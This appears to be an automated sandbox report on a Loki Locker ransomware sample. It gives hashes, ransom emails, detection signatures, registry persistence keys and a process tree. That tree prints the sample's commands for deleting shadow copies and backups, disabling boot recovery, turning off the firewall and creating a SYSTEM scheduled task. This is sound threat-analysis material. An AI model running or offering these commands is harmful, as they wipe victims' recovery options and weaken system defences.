Analysis
- max time kernel: 150s
- max time network: 151s
- platform: windows10-2004_x64
- resource: win10v2004-20220414-en
- submitted: 09-05-2022 19:12
- Static task: static1
- Behavioral task: behavioral1
  Sample: tmp.exe
  Resource: win7-20220414-en
- Behavioral task: behavioral2
  Sample: tmp.exe
  Resource: win10v2004-20220414-en
General
- Target: tmp.exe
- Size: 484KB
- MD5: 8b062fa952cc294d7db09794e2d44ce0
- SHA1: ce13e42217f7d0e950dd8ae5ee5ec8d5be6af177
- SHA256: 71d0c896720e01be1b6b095fc8917bcac38f8bc8ed3caba8bf9c2a4fcdde1747
- SHA512: a6643699544db21955c927e9a7cdfd1c056c7078e27d9c68ff68865c240ff3dfd0f8aecd7f4926b9746eaa989b3cbef681e5ffd19c643cd02a7faba2534ed26d
Malware Config
- Extracted from: C:\Restore-My-Files.txt
  DecryptionCenter@gmail.com
  DecryptionCenter@outlook.com
- Extracted from: C:\Users\Admin\AppData\Local\Temp\info.hta
  DecryptionCenter@gmail.com
  DecryptionCenter@outlook.com
Signatures
- Lockbit
  Ransomware family with multiple variants released since late 2019.
- suricata: ET MALWARE Loki Locker Ransomware CnC Activity
- suricata: ET MALWARE Loki Locker Ransomware CnC Domain in DNS Lookup
- suricata: ET MALWARE Loki Locker Ransomware User-Agent
- Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.
- Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
  Processes:
    pid   process
    4772  bcdedit.exe
    3900  bcdedit.exe
- Deletes System State backups
  Processes:
    pid   process
    2588  wbadmin.exe
- Deletes backup catalog
  Processes:
    pid   process
    4416  wbadmin.exe
- Disables Task Manager via registry modification
- Modifies Windows Firewall (1 TTPs)
- Modifies extensions of user files (1 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes:
    description | ioc | process
    File opened for modification | C:\Users\Admin\Pictures\RenameEnable.tiff | tmp.exe
- Checks computer location settings (2 TTPs, 1 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes:
    description | ioc | process
    Key value queried | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation | tmp.exe
- Drops startup file (3 IoCs)
  Processes:
    description | ioc | process
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.exe | tmp.exe
    File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winlogon.exe | tmp.exe
    File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wvtymcow.bat | tmp.exe
- Adds Run key to start application (2 TTPs, 2 IoCs)
  Processes:
    description | ioc | process
    Set value (str) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Michael Gillespie = "C:\\ProgramData\\winlogon.exe" | tmp.exe
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Michael Gillespie = "C:\\Windows\\winlogon.exe" | tmp.exe
- Drops desktop.ini file(s) (28 IoCs)
- Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  Processes:
    description | ioc | process
    Set value (str) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\kjfb04uq.Loki" | tmp.exe
- Drops file in Program Files directory (64 IoCs)
- Drops file in Windows directory (5 IoCs)
  Processes:
    description | ioc | process
    File created | C:\Windows\winlogon.exe | tmp.exe
    File opened for modification | C:\Windows\winlogon.exe | tmp.exe
    File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.3.etl | wbadmin.exe
    File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.2.etl | wbadmin.exe
    File opened for modification | C:\Windows\Logs\WindowsBackup\WBEngine.1.etl | wbadmin.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Checks SCSI registry key(s) (3 TTPs, 4 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  Processes:
    description | ioc | process
    Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | vds.exe
    Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | vds.exe
    Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | vds.exe
    Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | vds.exe
- Creates scheduled task(s) (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Interacts with shadow copies (2 TTPs, 1 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes:
    pid   process
    4368  vssadmin.exe
- Modifies Control Panel (2 IoCs)
  Processes:
    description | ioc | process
    Set value (int) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\Desktop\WallpaperStyle = "2" | tmp.exe
    Set value (str) | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\Desktop\TileWallpaper = "0" | tmp.exe
- Modifies registry class (8 IoCs)
  Processes:
    description | ioc | process
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.Loki\ = "Loki" | tmp.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Loki\shell\open\command | tmp.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Loki | tmp.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Loki\shell | tmp.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Loki\shell\open | tmp.exe
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Loki\shell\open\command\ = "C:\\ProgramData\\bpevytwo.exe \"%l\" " | tmp.exe
    Key created | \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings | tmp.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.Loki | tmp.exe
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
- Suspicious use of AdjustPrivilegeToken (50 IoCs)
- Suspicious use of WriteProcessMemory (55 IoCs)
- System policy modification (1 TTPs, 2 IoCs)
  Processes:
    description | ioc | process
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Encrypted by Loki locker" | tmp.exe
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your files have been encrypted due to a security problem with your computer\r\nIf you want to restore them, write us to the e-mail: DecryptionCenter@gmail.com\r\nWrite this ID in the title of your message: B00E6D83\r\nIn case of no answer in 24 hours write us to this e-mail: DecryptionCenter@outlook.com" | tmp.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\tmp.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\tmp.exe"
  - Modifies extensions of user files
  - Checks computer location settings
  - Drops startup file
  - Adds Run key to start application
  - Drops desktop.ini file(s)
  - Sets desktop wallpaper using registry
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Modifies Control Panel
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /C schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\schtasks.exe
      Command line: schtasks /CREATE /SC ONLOGON /TN Loki /TR C:\Users\Admin\AppData\Roaming\winlogon.exe /RU SYSTEM /RL HIGHEST /F
      - Creates scheduled task(s)
  - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    Command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yoikjizn\yoikjizn.cmdline"
    - Suspicious use of WriteProcessMemory
    - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES351A.tmp" "c:\ProgramData\CSC92A2AE7CFC0E4AAB9B11A0211339996E.TMP"
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\vssadmin.exe
      Command line: vssadmin delete shadows /all /quiet
      - Interacts with shadow copies
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /C wbadmin DELETE SYSTEMSTATEBACKUP
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\wbadmin.exe
      Command line: wbadmin DELETE SYSTEMSTATEBACKUP
      - Deletes System State backups
      - Drops file in Windows directory
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /C wmic shadowcopy delete
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\Wbem\WMIC.exe
      Command line: wmic shadowcopy delete
      - Suspicious use of AdjustPrivilegeToken
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\wbadmin.exe
      Command line: wbadmin delete catalog -quiet
      - Deletes backup catalog
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\bcdedit.exe
      Command line: bcdedit /set {default} bootstatuspolicy ignoreallfailures
      - Modifies boot configuration data using bcdedit
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\bcdedit.exe
      Command line: bcdedit /set {default} recoveryenabled no
      - Modifies boot configuration data using bcdedit
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\netsh.exe
      Command line: netsh advfirewall set currentprofile state off
  - C:\Windows\System32\cmd.exe
    Command line: "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable
    - Suspicious use of WriteProcessMemory
    - C:\Windows\system32\netsh.exe
      Command line: netsh firewall set opmode mode=disable
  - C:\Windows\SysWOW64\mshta.exe
    Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  - C:\Windows\SysWOW64\mshta.exe
    Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  - C:\Windows\SysWOW64\mshta.exe
    Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  - C:\Windows\SysWOW64\mshta.exe
    Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  - C:\Windows\SysWOW64\mshta.exe
    Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\info.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
- C:\Windows\system32\wbengine.exe
  Command line: "C:\Windows\system32\wbengine.exe"
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
- C:\Windows\System32\vdsldr.exe
  Command line: C:\Windows\System32\vdsldr.exe -Embedding
- C:\Windows\System32\vds.exe
  Command line: C:\Windows\System32\vds.exe
  - Checks SCSI registry key(s)
-
memory/292-162-0x0000000000000000-mapping.dmp
-
memory/516-149-0x0000000000000000-mapping.dmp
-
memory/532-143-0x0000000000000000-mapping.dmp
-
memory/616-145-0x0000000000000000-mapping.dmp
-
memory/904-147-0x0000000000000000-mapping.dmp
-
memory/1180-148-0x0000000000000000-mapping.dmp
-
memory/1388-146-0x0000000000000000-mapping.dmp
-
memory/1816-152-0x0000000000000000-mapping.dmp
-
memory/2024-134-0x0000000000000000-mapping.dmp
-
memory/2588-150-0x0000000000000000-mapping.dmp
-
memory/2736-131-0x00000000033B0000-0x0000000003426000-memory.dmpFilesize
472KB
-
memory/2736-130-0x0000000000840000-0x00000000008C2000-memory.dmpFilesize
520KB
-
memory/2736-132-0x00007FFE537D0000-0x00007FFE54291000-memory.dmpFilesize
10.8MB
-
memory/2740-151-0x0000000000000000-mapping.dmp
-
memory/2812-144-0x0000000000000000-mapping.dmp
-
memory/3048-160-0x0000000000000000-mapping.dmp
-
memory/3100-133-0x0000000000000000-mapping.dmp
-
memory/3276-157-0x0000000000000000-mapping.dmp
-
memory/3900-156-0x0000000000000000-mapping.dmp
-
memory/4368-153-0x0000000000000000-mapping.dmp
-
memory/4384-163-0x0000000000000000-mapping.dmp
-
memory/4416-154-0x0000000000000000-mapping.dmp
-
memory/4484-158-0x0000000000000000-mapping.dmp
-
memory/4688-159-0x0000000000000000-mapping.dmp
-
memory/4772-155-0x0000000000000000-mapping.dmp
-
memory/4920-161-0x0000000000000000-mapping.dmp
-
memory/4996-139-0x0000000000000000-mapping.dmp
-
memory/5008-135-0x0000000000000000-mapping.dmp